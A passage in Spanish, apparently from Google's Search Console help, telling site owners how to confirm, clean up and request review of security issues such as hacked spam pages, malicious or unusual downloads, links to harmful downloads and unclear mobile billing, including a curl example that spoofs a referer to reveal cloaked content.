  • Utilizar cURL o Wget para hacer solicitudes HTTP, como obtener una página, desde la línea de comandos. Estas herramientas gratuitas resultan útiles para diagnosticar redirecciones y permiten indicar datos de la URL referente o el agente de usuario. A menudo, los hackers atacan solo a agentes de usuario o URL referentes concretas para evitar ser detectados y seleccionar mejores objetivos; con estas herramientas, puedes simular objetivos. Si tu solicitud no provoca el comportamiento fraudulento, prueba a utilizar URL referentes distintas, como enlaces provenientes de sitios web grandes o de diferentes buscadores. Por ejemplo, para emular un usuario que sigue un enlace de los resultados de la Búsqueda de Google que lleva a www.example.com/page.html en Windows, debes utilizar cURL de esta manera:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Haz una consulta con las URL de ejemplo que figuran en el informe para ver si están activas. Probablemente no hayas creado estas páginas, por lo que deberás retirarlas de tu sitio web o eliminar el código que las genera automáticamente. Consulta más información sobre cómo buscar y limpiar estas páginas de tu sitio web.

También puedes hacer una búsqueda de "site:" para localizar páginas que no hayas creado.

  • En un sitio web pequeño, puedes buscar [site: example.com] en la Búsqueda de Google para que aparezca una lista de las páginas indexadas y ver si hay alguna que no hayas creado.
  • En sitios web más grandes, puedes hacer una consulta más específica, por ejemplo:
    • [site:example.com farmacia]: muestra todas las páginas de example.com que contienen la palabra "farmacia". Ve probando con otros términos frecuentes en el contenido fraudulento.
    • [site:example.com/wp-admin/]: muestra todas las páginas que hay en la sección del administrador del sitio web de tu sitio web de WordPress.

3. Limpia tu sitio web

Cuando tengas todo listo para limpiar tu sitio web, puedes retirar el contenido y los enlaces fraudulentos de cada página o sustituir los directorios afectados por la última copia de seguridad que tengas en buen estado.

Además:

4. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Descargas poco habituales

Tu sitio web ofrece una descarga que Navegación Segura de Google no ha visto antes. Es posible que Chrome advierta de que es una descarga poco habitual y que podría ser peligrosa. Estas advertencias desaparecen de forma automática cuando Navegación Segura de Google verifica que son archivos seguros.

1. Resuelve el problema

Averigua y confirma que tus descargas cumplen las directrices de descargas y, si alguna las infringe, retírala. Si no las infringen, no hace falta que las retires; simplemente solicita una revisión como se describe más abajo. Ten en cuenta que no siempre se dan URLs de ejemplo de este problema concreto.

2. Solicita una revisión

Después de retirar archivos o de comprobar que tus descargas cumplen con las directrices, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Descargas maliciosas

Tu sitio web ofrece a los usuarios una descarga que Navegación Segura de Google cree que es software malicioso o no deseado. Es posible que el navegador Chrome muestre una advertencia cuando un usuario visite tu sitio web. Para que la advertencia deje de aparecer, debes retirar estas descargas de tu sitio web.

1. Evalúa el problema

Si reconoces estas descargas, retíralas de tu sitio web y ve directamente al paso Solicita una revisión.

Si en tu sitio web hay alguna descarga que no reconoces, es posible que lo hayan pirateado, por lo que primero deberías corregirlo y, a continuación, buscar y eliminar las descargas.

2. Comprueba si puedes solucionar este problema

Consulta el artículo Crear un equipo de asistencia para saber más o menos qué te hace falta para solucionar el problema por tu cuenta o cómo encontrar ayuda si crees que no tienes los conocimientos necesarios.

3. Confirma que existe el problema

Consulta páginas de ejemplo de tu sitio web para confirmar que hay estas descargas.

4. Limpia tu sitio web

Lee la guía sobre cómo reparar sitios web pirateados para tener una solución completa y aplicarla en tu sitio web, además de consultar pasos de limpieza y conocer consejos para evitar que tu sitio web vuelva a ser pirateado. Cuando tengas todo listo para limpiar tu sitio web, puedes retirar el contenido fraudulento o sustituir los archivos afectados por la última copia de seguridad que tengas en buen estado. Con un software antivirus puedes analizar los binarios y el resto del contenido alojado en el sitio web y detectar muchos tipos de software malicioso y de software no deseado, pero no todos. Si envías tu software a un programa antivirus (o a un servicio de consolidación antivirus, como VirusTotal), recibirás un informe de los problemas que pueda contener. Navegación Segura de Google aplica sus propios criterios para determinar si un programa o un binario es un software malicioso o no deseado.

5. Confirma las soluciones

Asegúrate de que tu sitio web cumple con la política de software no deseado.

6. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Enlaces a descargas dañinas

Tu sitio web enlaza a sitios web que ofrecen descargas que son software malicioso o no deseado según Navegación Segura de Google. Es posible que el navegador Chrome muestre una advertencia cuando un usuario visite tu sitio web. Para eliminar la advertencia, debes eliminar los enlaces a los sitios web con contenido dañino.

1. Evalúa el problema

Si estos enlaces son intencionados, elimínalos de tu sitio web y ve directamente al paso Solicita una revisión.

Si no conoces estos enlaces, es posible que hayan pirateado tu sitio web.

2. Comprueba si puedes solucionar este problema

Si han pirateado tu sitio web, consulta el artículo Crear un equipo de asistencia para obtener una idea de lo que necesitarías para solucionar el problema por tu cuenta o cómo encontrar ayuda si crees que tus conocimientos no son suficientes.

3. Confirma que existe el problema

 

Consulta algunas de las páginas de ejemplo de tu sitio web para confirmar que existen estas descargas. En algunos casos, los piratas informáticos pueden ocultar estos enlaces si creen que eres el propietario del sitio web, así que prueba visitando las URL de muestra con la herramienta de inspección de URLs, o inicia sesión con una cuenta diferente o en otro ordenador.

4. Limpia tu sitio web

Lee la guía sobre cómo reparar sitios web pirateados para tener una solución completa y aplicarla en tu sitio web, además de consultar pasos de limpieza y conocer consejos para evitar que tu sitio web vuelva a ser pirateado. Cuando tengas todo listo para limpiar tu sitio web, puedes retirar el contenido fraudulento o sustituir los archivos afectados por la última copia de seguridad que tengas en buen estado.

5. Confirma las soluciones

Asegúrate de que tu sitio web cumple con la política de software no deseado.

6. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

Facturación poco clara en dispositivos móviles

Si se detecta que tu sitio web no informa correctamente sobre los cargos móviles, los usuarios verán un aviso en Chrome antes de acceder a la página.

1. Confirma que existe el problema

Visita las URL de ejemplo indicadas en el informe para ver qué páginas muestran una facturación poco clara en dispositivos móviles. Más información sobre las directrices de facturación en dispositivos móviles

2. Resolver el problema

Corrige tus páginas para que cumplan con las prácticas recomendadas sobre la facturación en dispositivos móviles.

3. Solicita una revisión

Cuando confirmes que el problema se ha resuelto en tu sitio web, solicita una revisión de seguridad mediante el informe "Problemas de seguridad". Estas revisiones pueden tardar entre unos pocos días y unas pocas semanas en completarse.

¿Qué diferencias hay entre el informe Acciones manuales y el informe Problemas de seguridad?

El informe "Acciones manuales" recoge los problemas de una página o un sitio web; en general, serán intentos de manipular el índice de búsqueda de Google que no siempre ponen en riesgo la seguridad de los usuarios. La mayoría de los problemas mencionados en este artículo acaban provocando que empeore el posicionamiento de una página o de un sitio web o incluso que desaparezcan de los resultados de búsqueda sin que el usuario reciba ninguna indicación visual al respecto.

El informe "Problemas de seguridad" señala indicios de que tu sitio web se ha visto atacado o se comporta de forma potencialmente peligrosa para los visitantes o sus ordenadores, como los ataques de suplantación de identidad (phishing) o la instalación de software malicioso o no deseado en el ordenador del usuario. Es posible que estas páginas aparezcan marcadas con etiquetas de advertencia en los resultados de búsqueda, o que un navegador muestre una página de advertencia intersticial cuando el usuario quiera visitarlas.

¿Te ha resultado útil esta información?
¿Cómo podemos mejorar esta página?